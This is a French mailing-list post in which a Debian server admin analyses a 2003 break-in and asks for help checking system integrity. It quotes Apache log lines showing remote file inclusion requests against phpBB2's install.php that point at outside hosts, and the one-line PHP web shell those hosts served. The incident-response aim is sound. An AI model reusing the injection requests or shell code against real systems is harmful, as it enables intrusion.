[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Hack sur GNU/Debian Woody !

Bon je crois que j'ai trouvé le problème, au moins j'aurais publié le code qu'il ne fallait surtout pas publier :) 
Dans d'autres logs d'apache que j'avais oublié j'ai retrouvé :
200.103.138.205 - - [29/Jul/2003:00:53:38 +0200] "GET /phpBB2/install.php?phpbb_root_dir=http://www.superwroger.hpg.ig.com.br / HTTP/1.1" 200 930 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" 200.103.138.205 - - [29/Jul/2003:00:53:38 +0200] "GET /phpBB2/install.php?phpbb_root_dir=http://www.superwroger.hpg.ig.com.br / HTTP/1.1" 200 359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" 
(...)
200.103.138.205 - - [29/Jul/2003:00:58:52 +0200] "GET /phpBB2/install.php?phpbb_root_dir=http://www.myxpls.hpg.ig.com.br/ HTT P/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
Donc une erreur de ma part en laissant le script d'installation de phpBB dans un répertoire, mea culpa... :-( En récupérant la page http://www.superwroger.hpg.ig.com.br/includes/functions_selects.php, voici ce qu'elle contient :
<pre> <?php system($command); ?> Donc cela exécute une commande (certes je ne vois pas laquelle, mais peu importe), quoiqu'il en soit l'heure et la date corroborent l'heure à laquelle le code source (logs) a été compilé... Si je ne me trompe en faisant cela, le 'hacker' n'a eu accès qu'aux droits d'apache qui sont très limité ? Donc il n'a pas su faire plus de dégats ou je me trompe ? Quoiqu'il en soit je vais devoir m'amuser à vérifier l'intégrité de mon système tout entier... Si quelqu'un a une autre méthode que s'amuser à faire les md5sum des exécutables importants sur mon serveur et puis sur une autre debian, cela m'intéresserait... Et aussi comment vérifies-t-on l'intégrité des fichiers wtmp/utmp/lastlog/messages et autres ? Aussi, peut-on se fier au résultat de chkrootkit (0.35) ? 
Merci à list(AT)zaide.org pour son aide qui m'a mis sur la voie.
Juste une dernière petite question, est-ce que cela sert à quelque chose d'essayer d'informer quelqu'un de ce 'méfait' ? l'I.S.P. ? LACNIC à qui appartient l'ip ? 
Merci d'avance.
Freedom66
Reply to: